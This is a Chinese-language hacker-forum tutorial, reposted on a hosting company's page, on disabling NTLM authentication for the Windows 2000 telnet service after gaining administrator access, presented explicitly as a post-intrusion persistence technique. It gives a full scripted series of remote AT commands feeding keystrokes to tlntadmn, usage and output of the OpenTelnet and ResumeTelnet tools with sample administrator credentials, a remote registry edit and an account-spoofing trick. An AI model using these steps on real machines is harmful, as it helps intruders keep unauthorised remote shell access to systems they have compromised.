遠程沖破telnet中NTLM權限驗證的多種方法
自從上大學后就很少寫這類文章了,謹以此文獻給我最愛的爸爸和媽媽,此文章是特別為我的好朋友中國暗域網(wǎng)絡會員 《閃客幽靈》 所寫,希望能對他有所幫助。感謝大家一如既往的支持中國暗域網(wǎng)絡。
原創(chuàng)聲明:
中國暗域網(wǎng)絡技術資訊站原創(chuàng)文章,文章作者 冰血封情<EvilOctal>,勞煩轉(zhuǎn)載請著名出處。我們將盡力將中國暗域網(wǎng)絡向?qū)W術性的站點偏移。
注意本文是在桂林電子工業(yè)學院計算機系專用學生機房做的實驗,目標機器的IP這里定為172.16.93.66。相關軟件將在文章末尾給出下載地址。
拙筆正文:
前幾天,我的一個朋友在我所在的中國暗域網(wǎng)絡的技術論壇(forum.hackway.net)問了一個有關于telnet的問題,我覺得的確是很有代表性,關于問題具體內(nèi)容我就不說了,為了節(jié)省時間空間這里只給出連接關于telnet中存在的疑問。按照中國暗域網(wǎng)絡的技術承諾,如果會員問了問題,凡是有必要的,站里都會專門為這位會員寫一篇文章做詳細[答疑]。由于冰血封情覺得問題太典型,所以我們單獨做了一個[原創(chuàng)]文章,為的是讓更多的朋友了解這個問題。至于高手就不用看本文了,我所寫的也都是笨拙的技巧。
其實,這都是入侵后期的一個技巧。很多情況下,當通過各種方式得到目標計算機的權限之后,為了方便日后登錄我們通常會利用或者開起一些目標計算機的服務。telnet便是其中很主要的角色之一。但是眾所周知的是,一旦telnet服務開啟了NTLM(NT Lan Manager)身份驗證,那對入侵者來說是件十分痛苦的事情。今天我們就來簡單討論一下各種解除NTLM的條件和方法。
NO1使用榕哥的作品ntlm.exe
感謝:我們中國網(wǎng)絡安全界優(yōu)秀的程序員小榕,歡迎大家訪問他的站點NetXEyes,也歡迎大家訪問中國網(wǎng)絡安全最高學府安全焦點,個人比較敬佩小榕前輩。
如果您知道了一臺主機的管理員權限,并確切的知道他的用戶ID和password,而且對方允許網(wǎng)際進程連接(ipc$)和AT命令,那么你可以使用這種方法。現(xiàn)在先和目標計算機建立一個ipc連接,然后將此文件copy到目標計算機上,然后通過AT命令執(zhí)行就OK了!這個方法應該是最方便的了,說到頭還是得感謝榕哥。這里是淺談,所以一些實在太過于基礎的步驟我就不詳細說了,如果有疑問,歡迎訪問中國暗域網(wǎng)絡技術論壇。
NO2通過自己編寫batch文件
感謝:其實這種方法N早就在《黑客X檔案》上有人寫過,我只是綜合一下,不知道會不會有'版權糾紛'?哈……不閑扯。這里很感謝2002年8月《黑客X檔案》第43頁文章《徒手屏蔽遠程telnet服務的ntlm認證》的作者heikeangel。
這個方法的實現(xiàn)條件和NO1相同。那么看看原文中heikeangel是怎么說的呢
……大家可以看一下Win2000和NT4自帶的tlntadmn這個命令,它是用來控制臺修改telnet設置的。很可惜,這是一個控制臺的交互式工具,所以at命令沒有辦法直接調(diào)用,F(xiàn)在我們執(zhí)行一下tlntadmn,然后按照以下的順序操作:停止服務(5)->更改設置(3)->NTLM(7)->確認更改(y)->修改NTLM當前值(0)->再次確認(y)->退出菜單(0)->啟動服務(4)->退出程序(0)……
好了按照所提示的方法,這里我們就編寫一個批處理文件,首先用AT命令取得對方系統(tǒng)時間。假設得到對方時間為20:11,然后鍵入……
at \\172.16.93.66 20:18 "echo 5 >> c:\evilin.txt"
at \\172.16.93.66 20:18 "echo 3 >> c:\evilin.txt"
at \\172.16.93.66 20:18 "echo 7 >> c:\evilin.txt"
at \\172.16.93.66 20:18 "echo y >> c:\evilin.txt"
at \\172.16.93.66 20:18 "echo 0 >> c:\evilin.txt"
at \\172.16.93.66 20:18 "echo y >> c:\evilin.txt"
at \\172.16.93.66 20:18 "echo 0 >> c:\evilin.txt"
at \\172.16.93.66 20:18 "echo 4 >> c:\evilin.txt"
at \\172.16.93.66 20:18 "echo 0 >> c:\evilin.txt"
at \\172.16.93.66 20:18 "c:\winnt\system32\tlntadmn.exe < c:\evilin.txt"
at \\172.16.93.66 20:18 "del c:\evilin.txt /f"
然后再用AT命令執(zhí)行at 172.16.93.66 20:18 tlntadmn,c:\evilin.txt就一切搞掂了!
NO3通過工具opentelnet.exe
感謝:工具OpenTelnet.exe和ResumeTelnet.exe的作者refdom前輩,他的文章WIN2K的Telnet服務Hacking吐血推薦閱讀。當然也歡迎訪問中國網(wǎng)絡安全最高學府安全焦點。
如果您知道了一臺主機的管理員權限,并確切的知道他的用戶ID和password,并且對方還沒開telnet,那么我們就厚起臉皮用高手寫的工具開始吧。具體過程refdom前輩已經(jīng)很詳細的介紹在文章中了。(為了方便和本文的結合,我修改了target IP希望refdom前輩理解)
Opentelnet.exe的用法:
OpenTelnet.exe \\server <帳號> <密碼> <NTLM認證方式> <Telnet端口>
比如下面的:(命令意思是連接172.16.93.66,帳號administrator,密碼123456 ,0表示不使用NTLM認證方式,
Telnet的端口是90)
C:\>OpenTelnet.exe \\172.16.93.66 administrator 123456 0 90
當程序運行后得到:
BINGLE!!!Yeah!!
Telnet Port is 90. You can try:"telnet ip 90", to connect the server!
Disconnecting server...Successfully!
就說明Telnet服務啟動成功,并且使用的端口是90。這樣,我們就能夠得到一個開90端口的Windows 2000 Telnet服務器。
Telnet 172.16.93.66
就可以登錄上去了,而且不使用 NTLM認證方式。
ResumeTelnet.exe,是用來恢復Telnet配置的,并關閉Telnet服務器,它的用法是:
ResumeTelnet.exe \\ip <帳號> <密碼>
例如:
C:\>ResumeTelnet.exe \\172.16.93.66 administrator 123456
如果程序運行后顯示:
BINGLE!!!
The config of remote telnet server is resumed!
Disconnecting server...Successfully!
就說明服務器端Telnet 的配置又返回到原來的狀態(tài)中了。
再次以最高的敬意感謝refdom前輩。
NO4利用遠程注冊表實現(xiàn)
如果您知道了一臺主機的管理員權限,并確切的知道他的用戶ID和password,并且對方開啟了遠程注冊表服務和telnet服務。
首先我們和172.16.93.66建立ipc$連接,然后啟動本地的注冊表編輯器,選擇"工具"中的"連接網(wǎng)絡注冊表",在出現(xiàn)的連接對話框中輸入172.16.93.66,回車后進入遠程注冊表,找到HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer\1.0下的NTLM鍵值,將其修改為0或者1,完成后斷開所有連接,只要對方重新啟動后就徹底擺平!
NO5利用系統(tǒng)新建用戶
如果您知道了一臺主機的管理員權限,并確切的知道他的用戶ID和password,并且對方開啟了telnet服務。那么我們來介紹一下這種方法……大體上的目標是在本地建立一個和對方帳號同名同權限的帳號,以這種修改連接身份的方法來繞過驗證。
這里具體方法如下。首先照上面所說的建立一個符合要求的用戶,這里我們把叫做"跳板"用戶,然后在c:\WINNT\SYSTEM32\cmd.exe上單擊右鍵選擇"屬性",在"屬性"選項卡中勾選"以其他用戶身份運行","確定"后,雙擊運行它,輸入你所建立的那個"跳板"用戶的ID和password,然后直接可以在這個cmd.exe中實現(xiàn)Telnet而不需要NTLM身份驗證了。多爽?
本文就寫到這里,這只是平時積累的點知識,拿出來給大家分享,本文完全免費投放于網(wǎng)絡。希望我的拙劣技巧能給大家一點啟迪,開放出更新的方法,歡迎來中國暗域網(wǎng)絡和我討論,我是菜鳥冰血封情。由于本人的水平不濟,文章有不到之處,請高手斧正!再次感謝所有為中國網(wǎng)絡安全發(fā)展做出貢獻的高手和前輩們,你們是偉大的。enjoy it! Good luck: )
億恩科技地址(ADD):鄭州市黃河路129號天一大廈608室 郵編(ZIP):450008 傳真(FAX):0371-60123888
聯(lián)系:億恩小凡
QQ:89317007
電話:0371-63322206
本文出自:億恩科技【mszdt.com】
服務器租用/服務器托管中國五強!虛擬主機域名注冊頂級提供商!15年品質(zhì)保障!--億恩科技[ENKJ.COM]
|